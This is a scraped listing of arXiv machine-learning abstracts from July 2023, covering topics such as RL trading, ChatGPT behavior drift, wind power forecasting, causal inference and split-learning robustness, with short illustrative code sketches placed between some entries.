    The use of machine learning in algorithmic trading systems is increasingly common. In a typical set-up, supervised learning is used to predict the future prices of assets, and those predictions drive a simple trading and execution strategy. This is quite effective when the predictions have sufficient signal, markets are liquid, and transaction costs are low. However, those conditions often do not hold in thinly traded financial markets and markets for differentiated assets such as real estate or vehicles. In these markets, the trading strategy must consider the long-term effects of taking positions that are relatively more difficult to change. In this work, we propose a Reinforcement Learning (RL) algorithm that trades based on signals from a learned predictive model and addresses these challenges. We test our algorithm on 20+ years of equity data from Bursa Malaysia.
How is ChatGPT's behavior changing over time? (arXiv:2307.09009v1 [cs.CL])
GPT-3.5 and GPT-4 are the two most widely used large language model (LLM) services. However, when and how these models are updated over time is opaque. Here, we evaluate the March 2023 and June 2023 versions of GPT-3.5 and GPT-4 on four diverse tasks: 1) solving math problems, 2) answering sensitive/dangerous questions, 3) generating code and 4) visual reasoning. We find that the performance and behavior of both GPT-3.5 and GPT-4 can vary greatly over time. For example, GPT-4 (March 2023) was very good at identifying prime numbers (accuracy 97.6%) but GPT-4 (June 2023) was very poor on these same questions (accuracy 2.4%). Interestingly, GPT-3.5 (June 2023) was much better than GPT-3.5 (March 2023) on this task. GPT-4 was less willing to answer sensitive questions in June than in March, and both GPT-4 and GPT-3.5 had more formatting mistakes in code generation in June than in March. Overall, our findings show that the behavior of the same LLM service can change substantially in a relatively short amount of time, highlighting the need for continuous monitoring of LLM quality.
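The continuous monitoring called for here amounts to re-running a frozen task suite against each model snapshot and tracking the accuracy gap. A minimal sketch with hypothetical stub callables standing in for the March and June snapshots (real services would be API calls):

```python
def drift_report(tasks, model_a, model_b):
    """Compare two model snapshots on a fixed task suite.

    `tasks` is a list of (prompt, expected) pairs; each model is a callable
    mapping prompt -> answer. Returns per-snapshot accuracy and the gap.
    """
    def accuracy(model):
        hits = sum(1 for prompt, expected in tasks if model(prompt) == expected)
        return hits / len(tasks)
    acc_a, acc_b = accuracy(model_a), accuracy(model_b)
    return {"march": acc_a, "june": acc_b, "drift": acc_b - acc_a}

# Hypothetical stubs standing in for two versions of the same LLM service:
march = lambda q: "yes" if q.endswith("prime?") else "no"
june = lambda q: "no"
tasks = [("Is 17 prime?", "yes"), ("Is 15 prime?", "no"), ("Is 2 prime?", "yes")]
report = drift_report(tasks, march, june)
```

A negative `drift` flags a regression between snapshots, mirroring the prime-number example above.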
    Application of BERT in Wind Power Forecasting-Teletraan's Solution in Baidu KDD Cup 2022. (arXiv:2307.09248v1 [cs.LG])
Nowadays, wind energy has drawn increasing attention for its important role in carbon neutrality and sustainable development. When wind power is integrated into the power grid, precise forecasting is necessary for the sustainability and security of the system. However, its unpredictable nature and the long sequence prediction make this especially challenging. In this technical report, we introduce the BERT model applied to Baidu KDD Cup 2022, with daily fluctuation added by post-processing to bring the predicted results in line with daily periodicity. Our solution achieves 3rd place among 2490 teams. The code is released at https://github.com/LongxingTan/KDD2022-Baidu
    An Evaluation of Zero-Cost Proxies -- from Neural Architecture Performance to Model Robustness. (arXiv:2307.09365v1 [cs.LG])
Zero-cost proxies are nowadays frequently studied and used to search for neural architectures. They show an impressive ability to predict the performance of architectures by making use of their untrained weights. These techniques allow for immense search speed-ups. So far, the joint search for well-performing and robust architectures has received much less attention in the field of NAS. Therefore, the main focus of zero-cost proxies is the clean accuracy of architectures, whereas model robustness should play an equally important part. In this paper, we analyze the ability of common zero-cost proxies to serve as performance predictors for robustness in the popular NAS-Bench-201 search space. We are interested in the single prediction task for robustness and the joint multi-objective of clean and robust accuracy. We further analyze the feature importance of the proxies and show that predicting the robustness makes the prediction task from existing zero-cost proxies more challenging. As a result, the joint consideration of several proxies becomes necessary to predict a model's robustness while the clean accuracy can be regressed from a single such feature.
    Funnel-based Reward Shaping for Signal Temporal Logic Tasks in Reinforcement Learning. (arXiv:2212.03181v2 [eess.SY] UPDATED)
Signal Temporal Logic (STL) is a powerful framework for describing the complex temporal and logical behaviour of dynamical systems. Numerous studies have attempted to employ reinforcement learning to learn a controller that enforces STL specifications; however, they have been unable to effectively tackle the challenges of ensuring robust satisfaction in continuous state space and maintaining tractability. In this paper, leveraging the concept of funnel functions, we propose a tractable reinforcement learning algorithm to learn a time-dependent policy for robust satisfaction of STL specifications in continuous state space. We demonstrate the utility of our approach on several STL tasks using different environments.
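A funnel function is a prescribed performance envelope that shrinks over time. One common construction, shown here as an illustrative sketch rather than the paper's exact shaping, rewards the agent for keeping the tracking error inside the funnel and penalizes it once the error escapes:

```python
import math

def funnel(t, rho0=2.0, rho_inf=0.1, decay=1.0):
    """Exponentially shrinking performance envelope rho(t): starts at rho0
    and decays toward the steady-state width rho_inf."""
    return (rho0 - rho_inf) * math.exp(-decay * t) + rho_inf

def shaped_reward(error, t):
    """Dense reward: positive margin while the tracking error stays inside
    the funnel at time t, negative once it escapes."""
    return funnel(t) - abs(error)

# Early on, a large error is tolerated; later the envelope is tight:
r_early = shaped_reward(error=0.5, t=0.0)
r_late = shaped_reward(error=0.5, t=100.0)
```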
    DESCN: Deep Entire Space Cross Networks for Individual Treatment Effect Estimation. (arXiv:2207.09920v2 [cs.LG] UPDATED)
Causal Inference has wide applications in various areas such as E-commerce and precision medicine, and its performance heavily relies on the accurate estimation of the Individual Treatment Effect (ITE). Conventionally, ITE is predicted by modeling the treated and control response functions separately in their individual sample spaces. However, such an approach usually encounters two issues in practice, i.e. divergent distribution between treated and control groups due to treatment bias, and significant sample imbalance of their population sizes. This paper proposes Deep Entire Space Cross Networks (DESCN) to model treatment effects from an end-to-end perspective. DESCN captures the integrated information of the treatment propensity, the response, and the hidden treatment effect through a cross network in a multi-task learning manner. Our method jointly learns the treatment and response functions in the entire sample space to avoid treatment bias and employs an intermediate pseudo treatment effect prediction network to relieve sample imbalance. Extensive experiments are conducted on a synthetic dataset and a large-scale production dataset from the E-commerce voucher distribution business. The results indicate that DESCN can successfully enhance the accuracy of ITE estimation and improve the uplift ranking performance. A sample of the production dataset and the source code are released to facilitate future research in the community, which is, to the best of our knowledge, the first large-scale public biased treatment dataset for causal inference.
    Online Observer-Based Inverse Reinforcement Learning. (arXiv:2011.02057v3 [eess.SY] UPDATED)
    In this paper, a novel approach to the output-feedback inverse reinforcement learning (IRL) problem is developed by casting the IRL problem, for linear systems with quadratic cost functions, as a state estimation problem. Two observer-based techniques for IRL are developed, including a novel observer method that re-uses previous state estimates via history stacks. Theoretical guarantees for convergence and robustness are established under appropriate excitation conditions. Simulations demonstrate the performance of the developed observers and filters under noisy and noise-free measurements.
    Extreme heatwave sampling and prediction with analog Markov chain and comparisons with deep learning. (arXiv:2307.09060v1 [physics.ao-ph])
We present a data-driven emulator, a stochastic weather generator (SWG), suitable for estimating probabilities of prolonged heatwaves in France and Scandinavia. This emulator is based on the method of analogs of circulation, to which we add temperature and soil moisture as predictor fields. We train the emulator on an intermediate complexity climate model run and show that it is capable of predicting conditional probabilities (forecasting) of heatwaves out of sample. Special attention is paid to evaluating this prediction with a proper score appropriate for rare events. To accelerate the computation of analogs, dimensionality reduction techniques are applied and their performance is evaluated. The probabilistic prediction achieved with the SWG is compared with that achieved with a Convolutional Neural Network (CNN). With the availability of hundreds of years of training data, CNNs perform better at the task of probabilistic prediction. In addition, we show that the SWG emulator trained on 80 years of data is capable of estimating extreme return times on the order of thousands of years for heatwaves longer than several days more precisely than a fit based on the generalised extreme value distribution. Finally, the quality of the synthetic extreme teleconnection patterns obtained with the stochastic weather generator is studied. We showcase two examples of such synthetic teleconnection patterns for heatwaves in France and Scandinavia that compare favorably to the very long climate model control run.
    Enhancing Pattern Classification in Support Vector Machines through Matrix Formulation. (arXiv:2307.09372v1 [cs.LG])
    Support Vector Machines (SVM) have gathered significant acclaim as classifiers due to their successful implementation of Statistical Learning Theory. However, in the context of multiclass and multilabel settings, the reliance on vector-based formulations in existing SVM-based models poses limitations regarding flexibility and ease of incorporating additional terms to handle specific challenges. To overcome these limitations, our research paper focuses on introducing a matrix formulation for SVM that effectively addresses these constraints. By employing the Accelerated Gradient Descent method in the dual, we notably enhance the efficiency of solving the Matrix-SVM problem. Experimental evaluations on multilabel and multiclass datasets demonstrate that Matrix SVM achieves superior time efficacy while delivering similar results to Binary Relevance SVM. Moreover, our matrix formulation unveils crucial insights and advantages that may not be readily apparent in traditional vector-based notations. We emphasize that numerous multilabel models can be viewed as extensions of SVM, with customised modifications to meet specific requirements. The matrix formulation presented in this paper establishes a solid foundation for developing more sophisticated models capable of effectively addressing the distinctive challenges encountered in multilabel learning.
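The efficiency gain above comes from running Accelerated Gradient Descent on the dual. A generic sketch of Nesterov's momentum schedule on a toy quadratic (not the paper's Matrix-SVM dual, which additionally involves the kernel matrix and box constraints) shows the update structure:

```python
import math

def nesterov(grad, x0, lr, steps):
    """Nesterov accelerated gradient descent with the classical momentum
    schedule t_{k+1} = (1 + sqrt(1 + 4 t_k^2)) / 2."""
    x, y, t = list(x0), list(x0), 1.0
    for _ in range(steps):
        g = grad(y)
        x_new = [yi - lr * gi for yi, gi in zip(y, g)]       # gradient step
        t_new = (1.0 + math.sqrt(1.0 + 4.0 * t * t)) / 2.0
        beta = (t - 1.0) / t_new
        y = [xn + beta * (xn - xo) for xn, xo in zip(x_new, x)]  # extrapolate
        x, t = x_new, t_new
    return x

# Toy quadratic f(x) = 0.5 * ||x - c||^2, minimized at c = (1, -2):
grad = lambda x: [x[0] - 1.0, x[1] + 2.0]
sol = nesterov(grad, [0.0, 0.0], lr=0.5, steps=100)
```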
    FakET: Simulating Cryo-Electron Tomograms with Neural Style Transfer. (arXiv:2304.02011v2 [cs.LG] UPDATED)
Particle localization and classification constitute two of the most fundamental problems in computational microscopy. In recent years, deep learning based approaches have been introduced for these tasks with great success. A key shortcoming of these supervised learning methods is their need for large training data sets, typically generated from particle models in conjunction with complex numerical forward models simulating the physics of transmission electron microscopes. Computer implementations of such forward models are computationally extremely demanding and limit the scope of their applicability. In this paper we propose a method for simulating the forward operator of an electron microscope based on additive noise and Neural Style Transfer techniques. We evaluate the method on localization and classification tasks using one of the established state-of-the-art architectures showing performance on par with the benchmark. In contrast to previous approaches, our method accelerates the data generation process by a factor of 750 while using 33 times less memory and scales well to typical transmission electron microscope detector sizes. It utilizes GPU acceleration and parallel processing. It can be used to adapt a synthetic training data set according to reference data from any transmission electron microscope. The source code is available at https://gitlab.com/deepet/faket.
    Multi-Player Zero-Sum Markov Games with Networked Separable Interactions. (arXiv:2307.09470v1 [cs.GT])
We study a new class of Markov games (MGs), \textit{Multi-player Zero-sum Markov Games} with {\it Networked separable interactions} (MZNMGs), to model the local interaction structure in non-cooperative multi-agent sequential decision-making. We define an MZNMG as a model where the payoffs of the auxiliary games associated with each state are zero-sum and have some separable (i.e., polymatrix) structure across the neighbors over some interaction network. We first identify the necessary and sufficient conditions under which an MG can be presented as an MZNMG, and show that the set of Markov coarse correlated equilibrium (CCE) collapses to the set of Markov Nash equilibrium (NE) in these games, in that the product of per-state marginalization of the former for all players yields the latter. Furthermore, we show that finding approximate Markov \emph{stationary} CCE in infinite-horizon discounted MZNMGs is \texttt{PPAD}-hard, unless the underlying network has a ``star topology''. Then, we propose fictitious-play-type dynamics, the classical learning dynamics in normal-form games, for MZNMGs, and establish convergence guarantees to Markov stationary NE under a star-shaped network structure. Finally, in light of the hardness result, we focus on computing a Markov \emph{non-stationary} NE and provide finite-iteration guarantees for a series of value-iteration-based algorithms. We also provide numerical experiments to corroborate our theoretical results.
    Non-Stationary Policy Learning for Multi-Timescale Multi-Agent Reinforcement Learning. (arXiv:2307.08794v1 [cs.LG])
    In multi-timescale multi-agent reinforcement learning (MARL), agents interact across different timescales. In general, policies for time-dependent behaviors, such as those induced by multiple timescales, are non-stationary. Learning non-stationary policies is challenging and typically requires sophisticated or inefficient algorithms. Motivated by the prevalence of this control problem in real-world complex systems, we introduce a simple framework for learning non-stationary policies for multi-timescale MARL. Our approach uses available information about agent timescales to define a periodic time encoding. In detail, we theoretically demonstrate that the effects of non-stationarity introduced by multiple timescales can be learned by a periodic multi-agent policy. To learn such policies, we propose a policy gradient algorithm that parameterizes the actor and critic with phase-functioned neural networks, which provide an inductive bias for periodicity. The framework's ability to effectively learn multi-timescale policies is validated on a gridworld and building energy management environment.
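A periodic time encoding of the kind described can be as simple as projecting the timestep onto the unit circle, so that the features repeat exactly every `period` steps. This is a minimal sketch of the idea; the paper's phase-functioned networks build a richer inductive bias on top of such a phase:

```python
import math

def periodic_encoding(t, period):
    """Map a timestep onto the unit circle so that t and t + period receive
    identical features, giving the policy an inductive bias for periodicity."""
    phase = 2.0 * math.pi * (t % period) / period
    return (math.sin(phase), math.cos(phase))

# A daily cycle of 24 steps: step 7 of day one matches step 7 of day two.
feat = periodic_encoding(t=7, period=24)
```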
    Execution-based Code Generation using Deep Reinforcement Learning. (arXiv:2301.13816v3 [cs.LG] UPDATED)
    The utilization of programming language (PL) models, pre-trained on large-scale code corpora, as a means of automating software engineering processes has demonstrated considerable potential in streamlining various code generation tasks such as code completion, code translation, and program synthesis. However, current approaches mainly rely on supervised fine-tuning objectives borrowed from text generation, neglecting unique sequence-level characteristics of code, including but not limited to compilability as well as syntactic and functional correctness. To address this limitation, we propose PPOCoder, a new framework for code generation that synergistically combines pre-trained PL models with Proximal Policy Optimization (PPO) which is a widely used deep reinforcement learning technique. By utilizing non-differentiable feedback from code execution and structure alignment, PPOCoder seamlessly integrates external code-specific knowledge into the model optimization process. It's important to note that PPOCoder is a task-agnostic and model-agnostic framework that can be used across different code generation tasks and PLs. Extensive experiments on three code generation tasks demonstrate the effectiveness of our proposed approach compared to SOTA methods, achieving significant improvements in compilation success rates and functional correctness across different PLs.
    Deep Learning for Mean Field Games with non-separable Hamiltonians. (arXiv:2301.02877v2 [cs.LG] UPDATED)
    This paper introduces a new method based on Deep Galerkin Methods (DGMs) for solving high-dimensional stochastic Mean Field Games (MFGs). We achieve this by using two neural networks to approximate the unknown solutions of the MFG system and forward-backward conditions. Our method is efficient, even with a small number of iterations, and is capable of handling up to 300 dimensions with a single layer, which makes it faster than other approaches. In contrast, methods based on Generative Adversarial Networks (GANs) cannot solve MFGs with non-separable Hamiltonians. We demonstrate the effectiveness of our approach by applying it to a traffic flow problem, which was previously solved using the Newton iteration method only in the deterministic case. We compare the results of our method to analytical solutions and previous approaches, showing its efficiency. We also prove the convergence of our neural network approximation with a single hidden layer using the universal approximation theorem.
    Towards Sustainable Deep Learning for Multi-Label Classification on NILM. (arXiv:2307.09244v1 [cs.LG])
    Non-intrusive load monitoring (NILM) is the process of obtaining appliance-level data from a single metering point, measuring total electricity consumption of a household or a business. Appliance-level data can be directly used for demand response applications and energy management systems as well as for awareness raising and motivation for improvements in energy efficiency and reduction in the carbon footprint. Recently, classical machine learning and deep learning (DL) techniques became very popular and proved as highly effective for NILM classification, but with the growing complexity these methods are faced with significant computational and energy demands during both their training and operation. In this paper, we introduce a novel DL model aimed at enhanced multi-label classification of NILM with improved computation and energy efficiency. We also propose a testing methodology for comparison of different models using data synthesized from the measurement datasets so as to better represent real-world scenarios. Compared to the state-of-the-art, the proposed model has its carbon footprint reduced by more than 23% while providing on average approximately 8 percentage points in performance improvement when testing on data derived from REFIT and UK-DALE datasets.
    Nonlinear Processing with Linear Optics. (arXiv:2307.08533v2 [physics.optics] UPDATED)
Deep neural networks have achieved remarkable breakthroughs by leveraging multiple layers of data processing to extract hidden representations, albeit at the cost of large electronic computing power. To enhance energy efficiency and speed, the optical implementation of neural networks aims to harness the advantages of optical bandwidth and the energy efficiency of optical interconnections. In the absence of low-power optical nonlinearities, the challenge in the implementation of multilayer optical networks lies in realizing multiple optical layers without resorting to electronic components. In this study, we present a novel framework that uses multiple scattering and is capable of synthesizing programmable linear and nonlinear transformations concurrently at low optical power by leveraging the nonlinear relationship between the scattering potential, represented by data, and the scattered field. Theoretical and experimental investigations show that repeating the data via multiple scattering enables non-linear optical computing with low-power continuous-wave light.
    Basal-Bolus Advisor for Type 1 Diabetes (T1D) Patients Using Multi-Agent Reinforcement Learning (RL) Methodology. (arXiv:2307.08897v1 [cs.LG])
    This paper presents a novel multi-agent reinforcement learning (RL) approach for personalized glucose control in individuals with type 1 diabetes (T1D). The method employs a closed-loop system consisting of a blood glucose (BG) metabolic model and a multi-agent soft actor-critic RL model acting as the basal-bolus advisor. Performance evaluation is conducted in three scenarios, comparing the RL agents to conventional therapy. Evaluation metrics include glucose levels (minimum, maximum, and mean), time spent in different BG ranges, and average daily bolus and basal insulin dosages. Results demonstrate that the RL-based basal-bolus advisor significantly improves glucose control, reducing glycemic variability and increasing time spent within the target range (70-180 mg/dL). Hypoglycemia events are effectively prevented, and severe hyperglycemia events are reduced. The RL approach also leads to a statistically significant reduction in average daily basal insulin dosage compared to conventional therapy. These findings highlight the effectiveness of the multi-agent RL approach in achieving better glucose control and mitigating the risk of severe hyperglycemia in individuals with T1D.
    FlexiAST: Flexibility is What AST Needs. (arXiv:2307.09286v1 [cs.SD])
    The objective of this work is to give patch-size flexibility to Audio Spectrogram Transformers (AST). Recent advancements in ASTs have shown superior performance in various audio-based tasks. However, the performance of standard ASTs degrades drastically when evaluated using different patch sizes from that used during training. As a result, AST models are typically re-trained to accommodate changes in patch sizes. To overcome this limitation, this paper proposes a training procedure to provide flexibility to standard AST models without architectural changes, allowing them to work with various patch sizes at the inference stage - FlexiAST. This proposed training approach simply utilizes random patch size selection and resizing of patch and positional embedding weights. Our experiments show that FlexiAST gives similar performance to standard AST models while maintaining its evaluation ability at various patch sizes on different datasets for audio classification tasks.
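The resizing of positional-embedding weights that FlexiAST relies on can be illustrated with simple linear interpolation of a 1-D embedding table to a new patch count (a sketch only; the paper's exact resizing operation, and the function name used here, are assumptions):

```python
def resize_pos_embed(pos, new_len):
    """Linearly interpolate a positional-embedding table to a new length.

    pos: list of embedding vectors (lists of floats), one per patch.
    new_len: target number of patches after changing the patch size.
    """
    old_len, dim = len(pos), len(pos[0])
    if new_len == 1:
        return [list(pos[0])]
    out = []
    for i in range(new_len):
        # map target index i onto the old grid, then blend neighbors
        x = i * (old_len - 1) / (new_len - 1)
        lo = int(x)
        hi = min(lo + 1, old_len - 1)
        w = x - lo
        out.append([(1 - w) * pos[lo][d] + w * pos[hi][d] for d in range(dim)])
    return out
```

In practice ViT-style models interpolate a 2-D grid of positional embeddings (and resize the patch-projection kernel as well); the 1-D case above just shows the idea.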
    Oracle Efficient Online Multicalibration and Omniprediction. (arXiv:2307.08999v1 [cs.LG])
    A recent line of work has shown a surprising connection between multicalibration, a multi-group fairness notion, and omniprediction, a learning paradigm that provides simultaneous loss minimization guarantees for a large family of loss functions. Prior work studies omniprediction in the batch setting. We initiate the study of omniprediction in the online adversarial setting. Although there exist algorithms for obtaining notions of multicalibration in the online adversarial setting, unlike batch algorithms, they work only for small finite classes of benchmark functions $F$, because they require enumerating every function $f \in F$ at every round. In contrast, omniprediction is most interesting for learning theoretic hypothesis classes $F$, which are generally continuously large. We develop a new online multicalibration algorithm that is well defined for infinite benchmark classes $F$, and is oracle efficient (i.e. for any class $F$, the algorithm has the form of an efficient reduction to a no-regret learning algorithm for $F$). The result is the first efficient online omnipredictor -- an oracle efficient prediction algorithm that can be used to simultaneously obtain no regret guarantees to all Lipschitz convex loss functions. For the class $F$ of linear functions, we show how to make our algorithm efficient in the worst case. Also, we show upper and lower bounds on the extent to which our rates can be improved: our oracle efficient algorithm actually promises a stronger guarantee called swap-omniprediction, and we prove a lower bound showing that obtaining $O(\sqrt{T})$ bounds for swap-omniprediction is impossible in the online setting. On the other hand, we give a (non-oracle efficient) algorithm which can obtain the optimal $O(\sqrt{T})$ omniprediction bounds without going through multicalibration, giving an information theoretic separation between these two solution concepts.
    Cooperative Multi-Objective Reinforcement Learning for Traffic Signal Control and Carbon Emission Reduction. (arXiv:2306.09662v2 [cs.LG] UPDATED)
    Existing traffic signal control systems rely on oversimplified rule-based methods, and even RL-based methods are often suboptimal and unstable. To address this, we propose a cooperative multi-objective architecture called Multi-Objective Multi-Agent Deep Deterministic Policy Gradient (MOMA-DDPG), which estimates multiple reward terms for traffic signal control optimization using age-decaying weights. Our approach involves two types of agents: one focuses on optimizing local traffic at each intersection, while the other aims to optimize global traffic throughput. We evaluate our method using real-world traffic data collected from an Asian country's traffic cameras. Despite the inclusion of a global agent, our solution remains decentralized as this agent is no longer necessary during the inference stage. Our results demonstrate the effectiveness of MOMA-DDPG, outperforming state-of-the-art methods across all performance metrics. Additionally, our proposed system minimizes both waiting time and carbon emissions. Notably, this paper is the first to link carbon emissions and global agents in traffic signal control.
    Convergent regularization in inverse problems and linear plug-and-play denoisers. (arXiv:2307.09441v1 [math.NA])
    Plug-and-play (PnP) denoising is a popular iterative framework for solving imaging inverse problems using off-the-shelf image denoisers. Their empirical success has motivated a line of research that seeks to understand the convergence of PnP iterates under various assumptions on the denoiser. While a significant amount of research has gone into establishing the convergence of the PnP iteration for different regularity conditions on the denoisers, not much is known about the asymptotic properties of the converged solution as the noise level in the measurement tends to zero, i.e., whether PnP methods are provably convergent regularization schemes under reasonable assumptions on the denoiser. This paper serves two purposes: first, we provide an overview of the classical regularization theory in inverse problems and survey a few notable recent data-driven methods that are provably convergent regularization schemes. We then continue to discuss PnP algorithms and their established convergence guarantees. Subsequently, we consider PnP algorithms with linear denoisers and propose a novel spectral filtering technique to control the strength of regularization arising from the denoiser. Further, by relating the implicit regularization of the denoiser to an explicit regularization functional, we rigorously show that PnP with linear denoisers leads to a convergent regularization scheme. More specifically, we prove that in the limit as the noise vanishes, the PnP reconstruction converges to the minimizer of a regularization potential subject to the solution satisfying the noiseless operator equation. The theoretical analysis is corroborated by numerical experiments for the classical inverse problem of tomographic image reconstruction.
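The PnP recipe surveyed above replaces the proximal step of an iterative solver with a denoiser. A minimal proximal-gradient sketch with a plug-in denoiser, using toy dense matrices and assumed names (the paper's analysis concerns linear denoisers, which fit the `denoise` slot here as a matrix-vector product):

```python
def pnp_iterate(A, y, denoise, eta, iters, x0):
    """Plug-and-play proximal gradient: x <- D(x - eta * A^T (A x - y)).

    A: forward operator as a list of rows; y: measurements;
    denoise: callable acting as the plugged-in denoiser D.
    """
    def matvec(M, v):
        return [sum(m * u for m, u in zip(row, v)) for row in M]

    AT = [list(col) for col in zip(*A)]  # transpose of A
    x = list(x0)
    for _ in range(iters):
        r = [a - b for a, b in zip(matvec(A, x), y)]  # residual A x - y
        g = matvec(AT, r)                             # gradient of the data term
        x = denoise([xi - eta * gi for xi, gi in zip(x, g)])
    return x
```

With the identity denoiser and an identity operator this reduces to plain gradient descent on the least-squares data term, converging to the measurements.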
    FedFormer: Contextual Federation with Attention in Reinforcement Learning. (arXiv:2205.13697v3 [cs.LG] CROSS LISTED)
    A core issue in multi-agent federated reinforcement learning is defining how to aggregate insights from multiple agents. This is commonly done by taking the average of each participating agent's model weights into one common model (FedAvg). We instead propose FedFormer, a novel federation strategy that utilizes Transformer Attention to contextually aggregate embeddings from models originating from different learner agents. In so doing, we attentively weigh the contributions of other agents with respect to the current agent's environment and learned relationships, thus providing a more effective and efficient federation. We evaluate our methods on the Meta-World environment and find that our approach yields significant improvements over FedAvg and non-federated Soft Actor-Critic single-agent methods. Our results compared to Soft Actor-Critic show that FedFormer achieves higher episodic return while still abiding by the privacy constraints of federated learning. Finally, we also demonstrate improvements in effectiveness with increased agent pools across all methods in certain tasks. This is contrasted by FedAvg, which fails to make noticeable improvements when scaled.
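For contrast, the FedAvg baseline mentioned above simply averages each parameter position across participating agents; a minimal sketch (flat parameter vectors and uniform client weighting assumed):

```python
def fed_avg(client_weights):
    """Average corresponding parameters across clients (FedAvg).

    client_weights: list of flat parameter lists, one per client.
    Returns the common aggregated model.
    """
    n = len(client_weights)
    return [sum(ws) / n for ws in zip(*client_weights)]
```

FedFormer replaces this uniform average with attention-weighted aggregation of embeddings, so each agent weighs the others' contributions by relevance to its own environment.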
    Sparse Gaussian Graphical Models with Discrete Optimization: Computational and Statistical Perspectives. (arXiv:2307.09366v1 [cs.LG])
    We consider the problem of learning a sparse graph underlying an undirected Gaussian graphical model, a key problem in statistical machine learning. Given $n$ samples from a multivariate Gaussian distribution with $p$ variables, the goal is to estimate the $p \times p$ inverse covariance matrix (aka precision matrix), assuming it is sparse (i.e., has a few nonzero entries). We propose GraphL0BnB, a new estimator based on an $\ell_0$-penalized version of the pseudolikelihood function, while most earlier approaches are based on the $\ell_1$-relaxation. Our estimator can be formulated as a convex mixed integer program (MIP) which can be difficult to compute at scale using off-the-shelf commercial solvers. To solve the MIP, we propose a custom nonlinear branch-and-bound (BnB) framework that solves node relaxations with tailored first-order methods. As a by-product of our BnB framework, we propose large-scale solvers for obtaining good primal solutions that are of independent interest. We derive novel statistical guarantees (estimation and variable selection) for our estimator and discuss how our approach improves upon existing estimators. Our numerical experiments on real/synthetic datasets suggest that our method can solve, to near-optimality, problem instances with $p = 10^4$ -- corresponding to a symmetric matrix of size $p \times p$ with $p^2/2$ binary variables. We demonstrate the usefulness of GraphL0BnB versus various state-of-the-art approaches on a range of datasets.
    Joint Microseismic Event Detection and Location with a Detection Transformer. (arXiv:2307.09207v1 [physics.geo-ph])
    Microseismic event detection and location are two primary components in microseismic monitoring, which offers us invaluable insights into the subsurface during reservoir stimulation and evolution. Conventional approaches for event detection and location often suffer from manual intervention and/or heavy computation, while current machine learning-assisted approaches typically address detection and location separately; such limitations hinder the potential for real-time microseismic monitoring. We propose an approach to unify event detection and source location into a single framework by adapting a Convolutional Neural Network backbone and an encoder-decoder Transformer with a set-based Hungarian loss, which is applied directly to recorded waveforms. The proposed network is trained on synthetic data simulating multiple microseismic events corresponding to random source locations in the area of suspected microseismic activity. A synthetic test on a 2D profile of the SEAM Time Lapse model illustrates the capability of the proposed method to detect events properly and locate them in the subsurface accurately, while a field test using the Arkoma Basin data further demonstrates its practicality and efficiency, and its potential to pave the way for real-time monitoring of microseismic events.
    An R package for parametric estimation of causal effects. (arXiv:2307.08686v2 [stat.ME] UPDATED)
    This article explains the usage of R package CausalModels, which is publicly available on the Comprehensive R Archive Network. While packages are available for sufficiently estimating causal effects, there lacks a package that provides a collection of structural models using the conventional statistical approach developed by Hernan and Robins (2020). CausalModels addresses this deficiency of software in R concerning causal inference by offering tools for methods that account for biases in observational data without requiring extensive statistical knowledge. These methods should not be ignored and may be more appropriate or efficient in solving particular problems. While implementations of these statistical models are distributed among a number of causal packages, CausalModels introduces a simple and accessible framework for a consistent modeling pipeline among a variety of statistical methods for estimating causal effects in a single R package. It consists of common methods including standardization, IP weighting, G-estimation, outcome regression, instrumental variables and propensity matching.
    On the Robustness of Split Learning against Adversarial Attacks. (arXiv:2307.07916v2 [cs.LG] UPDATED)
    Split learning enables collaborative deep learning model training while preserving data privacy and model security by avoiding direct sharing of raw data and model details (i.e., server and clients only hold partial sub-networks and exchange intermediate computations). However, existing research has mainly focused on examining its reliability for privacy protection, with little investigation into model security. Specifically, by exploring full models, attackers can launch adversarial attacks, and split learning can mitigate this severe threat by only disclosing part of the models to untrusted servers. This paper aims to evaluate the robustness of split learning against adversarial attacks, particularly in the most challenging setting where untrusted servers only have access to the intermediate layers of the model. Existing adversarial attacks mostly focus on the centralized setting instead of the collaborative setting; thus, to better evaluate the robustness of split learning, we develop a tailored attack called SPADV, which comprises two stages: 1) shadow model training, which addresses the issue of lacking part of the model, and 2) a local adversarial attack, which produces adversarial examples for evaluation. The first stage only requires a few unlabeled non-IID data samples, and, in the second stage, SPADV perturbs the intermediate output of natural samples to craft the adversarial ones. The overall cost of the proposed attack process is relatively low, yet the empirical attack effectiveness is significantly high, demonstrating the surprising vulnerability of split learning to adversarial attacks.
    Scalable Coupling of Deep Learning with Logical Reasoning. (arXiv:2305.07617v2 [cs.AI] UPDATED)
    In the ongoing quest for hybridizing discrete reasoning with neural nets, there is increasing interest in neural architectures that can learn how to solve discrete reasoning or optimization problems from natural inputs. In this paper, we introduce a scalable neural architecture and loss function dedicated to learning the constraints and criteria of NP-hard reasoning problems expressed as discrete Graphical Models. Our loss function solves one of the main limitations of Besag's pseudo-loglikelihood, enabling learning of high energies. We empirically show that it is able to efficiently learn how to solve NP-hard reasoning problems from natural inputs, such as the symbolic, visual, or many-solutions Sudoku problems, as well as the energy optimization formulation of the protein design problem, providing data efficiency, interpretability, and \textit{a posteriori} control over predictions.
    Siamese Networks for Weakly Supervised Human Activity Recognition. (arXiv:2307.08944v1 [cs.HC])
    Deep learning has been successfully applied to human activity recognition. However, training deep neural networks requires explicitly labeled data which is difficult to acquire. In this paper, we present a model with multiple siamese networks that are trained by using only the information about the similarity between pairs of data samples without knowing the explicit labels. The trained model maps the activity data samples into fixed size representation vectors such that the distance between the vectors in the representation space approximates the similarity of the data samples in the input space. Thus, the trained model can work as a metric for a wide range of different clustering algorithms. The training process minimizes a similarity loss function that forces the distance metric to be small for pairs of samples from the same kind of activity, and large for pairs of samples from different kinds of activities. We evaluate the model on three datasets to verify its effectiveness in segmentation and recognition of continuous human activity sequences.
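A similarity loss of the kind described, small for same-activity pairs that embed close together and penalizing different-activity pairs within a margin, can be sketched as a standard contrastive loss (the paper's exact loss and margin value are not given in the abstract, so this form is an assumption):

```python
import math

def euclidean(a, b):
    """Euclidean distance between two representation vectors."""
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))

def contrastive_loss(a, b, same, margin=1.0):
    """Contrastive similarity loss on a pair of embeddings.

    same=True: pull the pair together (loss = squared distance).
    same=False: push the pair at least `margin` apart.
    """
    d = euclidean(a, b)
    if same:
        return d ** 2
    return max(0.0, margin - d) ** 2
```

Minimizing this over pairs makes distance in the representation space approximate activity similarity, so any distance-based clustering algorithm can be applied downstream.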
    Batched Predictors Generalize within Distribution. (arXiv:2307.09379v1 [stat.ML])
